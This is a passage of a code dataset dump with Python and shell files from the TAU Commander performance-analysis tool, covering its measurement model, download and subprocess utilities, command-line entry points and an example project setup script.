protected]>'\n\nPROJECT_URL = 'http://www.taucommander.com/'\n\n#Expected Python version\nMINIMUM_PYTHON_VERSION = (2, 7)" }, { "alpha_fraction": 0.5308310985565186, "alphanum_fraction": 0.532674252986908, "avg_line_length": 34.099998474121094, "blob_id": "8510912ac458a0012729fd6f81d935fb8b1232cf", "content_id": "19d675d46ee1b6101e696dd3dc29cc2f43155263", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5968, "license_type": "permissive", "max_line_length": 95, "num_lines": 170, "path": "/packages/tau/model/measurement.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport string\n\n# TAU modules\nimport controller as ctl\nimport arguments as args\n\n\nclass Measurement(ctl.Controller, ctl.ByName):\n \"\"\"\n Measurement data model controller\n \"\"\"\n \n attributes = {\n 'projects': {\n 'collection': 'Project',\n 'via': 'measurements'\n },\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'measurement configuration name',\n 'metavar': '<measurement_name>'}\n\n },\n 'profile': {\n 'type': 'boolean',\n 'defaultsTo': True,\n 'argparse': {'flags': ('--profile',),\n 'help': 'gather application profiles',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'trace': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--trace',),\n 'help': 'gather application traces',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'sample': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--sample',),\n 'help': 'gather application program counter samples',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'source_inst': {\n 'type': 'boolean',\n 'defaultsTo': True,\n 'argparse': {'flags': ('--source-inst',),\n 'help': 'use source code parsing to instrument the application',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'compiler_inst': {\n 'type': 'string',\n 'defaultsTo': 'fallback',\n 'argparse': {'flags': ('--compiler-inst',),\n 'help': 'use compiler callbacks to instrument the application',\n 'metavar': 'mode',\n 'nargs': '?',\n 'const': 'always',\n 'choices': ['always', 'fallback', 'never']}\n },\n 'mpi': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--mpi',),\n 'help': 'measure time spent in MPI methods',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'openmp': {\n 'type': 'string',\n 'defaultsTo': 'ignore',\n 'argparse': {'flags': ('--openmp',),\n 'help': 'method used to measure time spent in OpenMP directives',\n 'metavar': 'method',\n 'nargs': '?',\n 'const': 'opari',\n 'choices': ['ignore', 'opari', 'ompt']}\n },\n 'callpath': {\n 'type': 'integer',\n 'defaultsTo': 2,\n 'argparse': {'flags': ('--callpath',),\n 'help': 'maximum depth of callpath recording',\n 'metavar': 'depth',\n 'nargs': '?',\n 'const': 2,\n 'type': int}\n },\n 'memory_usage': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--memory-usage',),\n 'help': 'measure memory consumption',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n 'memory_alloc': {\n 'type': 'boolean',\n 'defaultsTo': False,\n 'argparse': {'flags': ('--memory-alloc',),\n 'help': 'record memory allocation and deallocation events',\n 'metavar': 'T/F',\n 'nargs': '?',\n 'const': True,\n 'action': args.ParseBooleanAction}\n },\n }\n \n _valid_name = set(string.digits + string.letters + '-_.')\n \n def onCreate(self):\n if set(self['name']) > Measurement._valid_name:\n raise ctl.ModelError('%r is not a valid measurement name.' % self['name'],\n 'Use only letters, numbers, dot (.), dash (-), and underscore (_).')\n\n" }, { "alpha_fraction": 0.6304042935371399, "alphanum_fraction": 0.6369085311889648, "avg_line_length": 30.489959716796875, "blob_id": "860e5d8844dd76b3c2ea45f0f6ab6b5177f536b2", "content_id": "a6d7aa9fc1eec357276993267f063465c637edda", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7841, "license_type": "permissive", "max_line_length": 116, "num_lines": 249, "path": "/packages/tau/util.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport re\nimport subprocess\nimport errno\nimport shutil\nimport urllib\nimport tarfile\nimport pprint\nimport tempfile\nfrom StringIO import StringIO\n\n# TAU modules\nimport logger\nimport environment\nfrom tau.logger import LINE_WIDTH\n\n\nLOGGER = logger.getLogger(__name__)\n\n\ndef mkdirp(*args):\n \"\"\"\n Creates a directory and all its parents.\n \"\"\"\n for path in args:\n try:\n os.makedirs(path)\n LOGGER.debug('Created directory %r' % path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path): pass\n else: raise\n\n\ndef which(program):\n \"\"\"\n Returns the full path to 'program'\n Searches the system PATH and the current directory\n \"\"\"\n def is_exec(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n fpath, _ = os.path.split(program)\n if fpath:\n abs_program = os.path.abspath(program)\n if is_exec(abs_program):\n LOGGER.debug(\"which(%s) = '%s'\" % (program, abs_program))\n return abs_program\n else:\n # System path\n for path in environment.getEnv('PATH').split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if is_exec(exe_file):\n LOGGER.debug(\"which(%s) = '%s'\" % (program, exe_file))\n return exe_file\n LOGGER.debug(\"which(%s): command not found\" % program)\n return None\n\n\ndef download(src, dest):\n \"\"\"\n Downloads or copies 'src' to 'dest'\n \"\"\"\n if src.startswith('file://'):\n src = src[6:]\n if os.path.isfile(src):\n LOGGER.debug(\"Copying '%s' to '%s'\" % (src, dest))\n mkdirp(os.path.dirname(dest))\n shutil.copy(src, dest)\n return 0\n else:\n LOGGER.debug(\"Downloading '%s' to '%s'\" % (src, dest))\n LOGGER.info(\"Downloading '%s'\" % src)\n mkdirp(os.path.dirname(dest))\n curl = which('curl')\n LOGGER.debug(\"which curl: '%s'\" % curl)\n wget = which('wget')\n LOGGER.debug(\"which wget: '%s'\" % wget)\n curl_cmd = [curl, '-L', src, '-o', dest] if curl else None\n wget_cmd = [wget, src, '-O', dest] if wget else None\n for cmd in [curl_cmd, wget_cmd]:\n if cmd:\n ret = createSubprocess(cmd, stdout=False)\n if ret != 0:\n LOGGER.warning(\"%s failed to download '%s'. Retrying with a different method...\" % (cmd[0], src))\n else:\n return ret\n # Fallback: this is usually **much** slower than curl or wget\n def _dlProgress(count, blockSize, totalSize):\n sys.stdout.write(\"% 3.1f%% of %d bytes\\r\" % (min(100, float(count * blockSize) / totalSize * 100), totalSize))\n try:\n urllib.urlretrieve(src, dest, reporthook=_dlProgress)\n except Exception as err:\n LOGGER.warning(\"urllib failed to download '%s': %s\" % (src, err))\n raise IOError(\"Failed to download '%s'\" % src)\n\n \ndef extract(archive, dest):\n \"\"\"\n Extracts archive file 'archive' to dest\n \"\"\"\n with tarfile.open(archive) as fp:\n LOGGER.debug(\"Determining top-level directory name in '%s'\" % archive)\n dirs = [d.name for d in fp.getmembers() if d.type == tarfile.DIRTYPE]\n topdir = min(dirs, key=len)\n LOGGER.debug(\"Top-level directory in '%s' is '%s'\" % (archive, topdir))\n full_dest = os.path.join(dest, topdir)\n LOGGER.debug(\"Extracting '%s' to create '%s'\" % (archive, full_dest))\n LOGGER.info(\"Extracting '%s'\" % archive)\n mkdirp(dest)\n fp.extractall(dest)\n assert os.path.isdir(full_dest)\n LOGGER.debug(\"Created '%s'\" % full_dest)\n return full_dest\n\n\ndef file_accessible(filepath, mode='r'):\n \"\"\"\n Check if a file exists and is accessible.\n \"\"\"\n with open(filepath, mode) as _:\n return True\n return False\n\n \ndef pformatDict(d, title=None, empty_msg='No items.', indent=0, truncate=False):\n \"\"\"\n Pretty formater for dictionaries\n \"\"\"\n if title:\n line = '{:=<75}\\n'.format('== %s ==' % title)\n else:\n line = '' \n if d and len(d):\n longest = max(map(len, d.keys()))\n line_width = logger.LINE_WIDTH - longest - 15\n space = ' '*indent\n def pf(x):\n if truncate and (len(x) > line_width):\n return x[0:line_width] + ' [...]'\n else:\n return str(x)\n items = '\\n'.join(['{}{:<{width}} : {}'.format(space, key, pf(val), width=longest)\n for key, val in sorted(d.iteritems())])\n else:\n items = empty_msg\n return '%(line)s%(items)s' % {'line': line, 'items': items}\n \n\ndef pformatList(d, title=None, empty_msg='No items.', indent=0):\n \"\"\"\n Pretty formatter for lists\n \"\"\"\n if title:\n line = '{:=<75}\\n'.format('== %s ==' % title)\n else:\n line = ''\n if d and len(d):\n space = ' '*indent\n items = '\\n'.join(['%s%s' % (space, val) for val in sorted(d)])\n else:\n items = empty_msg\n return '%(line)s%(items)s' % {'line': line, 'items': items}\n\n\ndef createSubprocess(cmd, cwd=None, env=None, fork=False, stdout=True, log=True):\n \"\"\"\n \"\"\"\n if not cwd:\n cwd = os.getcwd()\n LOGGER.debug(\"Creating subprocess: cmd=%s, cwd='%s'\\n\" % (cmd, cwd))\n # Show what's different in the environment\n if env:\n changed = {}\n for key, val in env.iteritems():\n LOGGER.debug(\"%s=%s\" % (key, ''.join([c for c in val if ord(c) < 128 and ord(c) > 31])))\n try:\n orig = os.environ[key]\n except KeyError:\n changed[key] = val\n else:\n if val != orig:\n changed[key] = val\n LOGGER.info(pformatDict(changed, truncate=True))\n # Show what will be executed\n LOGGER.info(' '.join(cmd))\n pid = os.fork() if fork else 0\n if pid == 0:\n proc = subprocess.Popen(cmd, cwd=cwd, env=env,\n stdout=subprocess.PIPE, \n stderr=subprocess.STDOUT)\n stdout, stderr = proc.communicate()\n if log:\n LOGGER.debug(stdout)\n if stdout and (logger.LOG_LEVEL != 'DEBUG'):\n sys.stdout.write(stdout)\n retval = proc.returncode\n LOGGER.debug(\"%s returned %d\" % (cmd, retval))\n return retval\n else:\n return 0\n \ndef humanReadableSize(num, suffix='B'):\n \"\"\"\n Returns `num` bytes in human readable format\n \"\"\"\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\n" }, { "alpha_fraction": 0.6348122954368591, "alphanum_fraction": 0.6369678378105164, "avg_line_length": 33.36419677734375, "blob_id": "de2ecf285ab3506384fbbaddd5034ba433013284", "content_id": "72b46551d31b7c0bc5a4fb26c27cb9b66d344d99", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5567, "license_type": "permissive", "max_line_length": 105, "num_lines": 162, "path": "/packages/tau/__main__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\n\n# TAU modules\nimport tau\nimport commands\nimport logger\nimport util\nimport arguments as args\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"TAU Commander [ %s ]\" % tau.PROJECT_URL\n\nCOMMAND = 'tau'\n\nUSAGE = \"\"\"\n %(command)s [arguments] <subcommand> [options]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\nHints:\n - All parameters can be specified partially e.g. these all do the same thing:\n tau target create my_new_target --device_arch=GPU\n tau targ cre my_new_target --device=GPU\n tau t c my_new_target --d=GPU\n\"\"\" % {'command': COMMAND}\n\nUSAGE_EPILOG = \"\"\"\n%(command_descr)s\n\nshortcuts:\n tau <compiler> Execute a compiler command \n - Example: tau gcc *.c -o a.out\n - Alias for 'tau build <compiler>'\n tau <program> Gather data from a program\n - Example: tau ./a.out\n - Alias for 'tau trial create <program>'\n tau run <program> Gather data from a program\n - Example: tau ./a.out\n - Alias for 'tau trial create <program>'\n tau show Show data from the most recent trial \n - An alias for 'tau trial show'\n\nSee 'tau help <subcommand>' for more information on <subcommand>.\n\"\"\" % {'command_descr': commands.getCommandsHelp()}\n\n_arguments = [ (('command',), {'help': \"See subcommand descriptions below\",\n 'metavar': '<subcommand>'}),\n (('options',), {'help': \"Options to be passed to <subcommand>\",\n 'metavar': '[options]',\n 'nargs': args.REMAINDER}),\n (('-v', '--verbose'), {'help': \"Set logging level to DEBUG\",\n 'metavar': '', \n 'const': 'DEBUG', \n 'default': 'INFO', \n 'action': 'store_const'})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION,\n epilog=USAGE_EPILOG)\n\n\ndef getUsage():\n return PARSER.format_help()\n\ndef getHelp():\n return HELP\n\n\ndef main():\n \"\"\"\n Program entry point\n \"\"\" \n\n # Check Python version\n if sys.version_info < tau.MINIMUM_PYTHON_VERSION:\n version = '.'.join(map(str, sys.version_info[0:3]))\n expected = '.'.join(map(str, tau.MINIMUM_PYTHON_VERSION))\n LOGGER.error(\"Your Python version is %s but Python %s or later is required. Please update Python.\" % \n (version, sys.argv[0], expected))\n\n args = PARSER.parse_args()\n cmd = args.command\n cmd_args = args.options\n\n # Set verbosity level\n logger.setLogLevel(args.verbose)\n LOGGER.debug('Arguments: %s' % args)\n LOGGER.debug('Verbosity level: %s' % logger.LOG_LEVEL)\n \n # Try to execute as a TAU command\n try:\n return commands.executeCommand([cmd], cmd_args)\n except commands.UnknownCommandError:\n pass\n\n # Check shortcuts\n shortcut = None\n if commands.build.isCompatible(cmd):\n shortcut = ['build']\n cmd_args = [cmd] + cmd_args\n elif commands.trial.create.isCompatible(cmd):\n shortcut = ['trial', 'create']\n cmd_args = [cmd] + cmd_args\n elif cmd == 'run' and commands.build.isCompatible(cmd):\n shortcut = ['build']\n elif cmd == 'show':\n shortcut = ['trial', 'show']\n if shortcut:\n LOGGER.debug('Trying shortcut: %s' % shortcut)\n return commands.executeCommand(shortcut, cmd_args)\n else:\n LOGGER.debug('No shortcut found for %r' % cmd)\n\n # Not sure what to do at this point, so advise the user and exit\n LOGGER.info(\"Unknown command. Calling 'tau help %s' to get advice.\" % cmd)\n return commands.executeCommand(['help'], [cmd])\n \n# Command line execution\nif __name__ == \"__main__\":\n exit(main())\n" }, { "alpha_fraction": 0.6801389455795288, "alphanum_fraction": 0.6832965016365051, "avg_line_length": 31.316326141357422, "blob_id": "bd3bdeaa643f7e6a1d41c16c2a626065d0b1ebdb", "content_id": "7471fcc1d8b55babb459596b7adf9e812554f581", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3167, "license_type": "permissive", "max_line_length": 80, "num_lines": 98, "path": "/packages/tau/commands/target/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport arguments as args\n\n\nLOGGER = logger.getLogger(__name__)\n\n_name_parts = __name__.split('.')[1:]\nCOMMAND = ' '.join(['tau'] + _name_parts)\n\nSHORT_DESCRIPTION = \"Create and manage target configurations.\"\n\nGROUP = \"configuration\"\n\nUSAGE = \"\"\"\n %(command)s <subcommand> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nUSAGE_EPILOG = \"\"\"\n%(command_descr)s\n\nSee '%(command)s <subcommand> --help' for more information on <subcommand>.\n\"\"\" % {'command': COMMAND,\n 'command_descr': commands.getCommandsHelp(__name__)}\n\n\n\n_arguments = [ (('subcommand',), {'help': \"See 'subcommands' below\",\n 'metavar': '<subcommand>'}),\n (('options',), {'help': \"Arguments to be passed to <subcommand>\",\n 'metavar': '[arguments]',\n 'nargs': args.REMAINDER})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION,\n epilog=USAGE_EPILOG)\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n subcommand = args.subcommand\n options = args.options\n return commands.executeCommand(_name_parts + [subcommand], options)\n" }, { "alpha_fraction": 0.711796224117279, "alphanum_fraction": 0.7171581983566284, "avg_line_length": 23.064516067504883, "blob_id": "66f97eefe969c45d36bbfb1ac88a880fe8137898", "content_id": "387b6b4bb96fb51fcec30bbcaa1c0a4ae16a4d92", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 746, "license_type": "permissive", "max_line_length": 57, "num_lines": 31, "path": "/examples/mm/configure.sh", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif ! which tau >/dev/null 2>&1 ; then\n echo \"ERROR: 'tau' not found in PATH\"\n exit 1\nfi\n\n# Show commands as executed\nset +x\n\n# Example targets\ntarget_name=\"ex-`echo $HOSTNAME | cut -d. -f1`\"\ntau target create \"$target_name\"\n\n# Example applications\ntau application create \"ex-mm-serial\"\ntau application create \"ex-mm-openmp\" --openmp\ntau application create \"ex-mm-openmp-mpi\" --openmp --mpi\n\n# Example measurements\ntau measurement create \"ex-profile\"\ntau measurement create \"ex-trace\" --profile=F --trace=T\ntau measurement create \"ex-sample\" --profile=F --sample=T\n\n# Set up example project \ntau project create \"ex-mm\" \\\n $target_name \\\n ex-mm-serial ex-mm-openmp ex-mm-openmp-mpi \\\n ex-profile ex-trace ex-sample\n\ntau dashboard\n" }, { "alpha_fraction": 0.6181294322013855, "alphanum_fraction": 0.6203457713127136, "avg_line_length": 31.934307098388672, "blob_id": "890e60c290f7722f3008fa8a188e4005cff72259", "content_id": "64073472ad2473cd7d8c432dbe3a70c87216bd54", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4512, "license_type": "permissive", "max_line_length": 84, "num_lines": 137, "path": "/packages/tau/commands/target/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport arguments as args\nimport environment as env\nfrom model.target import Target\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List target configurations or show configuration details.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [target_name] [target_name] ... [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('names',), {'help': \"If given, show only targets with this name\",\n 'metavar': 'target_name', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the target\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n names = args.names\n except AttributeError:\n found = Target.all()\n else:\n found = []\n for name in names:\n t = Target.withName(name)\n if t:\n found.append(t)\n else:\n PARSER.error(\"No target configuration named '%s'\" % name)\n\n title = '{:=<{}}'.format('== Targets (%s) ==' % env.USER_PREFIX, \n logger.LINE_WIDTH)\n if not found:\n listing = \"No targets. See 'tau target create --help'\"\n else:\n table = Texttable(logger.LINE_WIDTH)\n cols = [('Name', 'r', 'name'), \n ('Host OS', 'c', 'host_os'), \n ('Host Arch.', 'c', 'host_arch'), \n ('Device Arch.', 'c', 'device_arch'),\n ('C', 'l', 'CC'),\n ('C++', 'l', 'CXX'),\n ('Fortran', 'l', 'FC'),\n ('In Projects', 'l', None)]\n headers = [header for header, _, _ in cols]\n rows = [headers]\n if args.long:\n parts = []\n for t in found:\n populated = t.populate()\n parts.append(pformat(populated))\n listing = '\\n'.join(parts)\n else:\n for t in found:\n populated = t.populate()\n projects = ', '.join([p['name'] for p in populated['projects']])\n row = [populated.get(attr, '') for _, _, attr in cols if attr] + [projects]\n rows.append(row)\n table.set_cols_align([align for _, align, _ in cols])\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([title, '', listing, '']))\n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.6297292709350586, "alphanum_fraction": 0.6318809390068054, "avg_line_length": 33.214725494384766, "blob_id": "9d2c720b591178dda65d7bbf9e12e517e8fbaf9f", "content_id": "d1c9843ccddfe398e166037b80924952d993cec0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5577, "license_type": "permissive", "max_line_length": 80, "num_lines": 163, "path": "/packages/tau/commands/project/create.py", "repo_name": 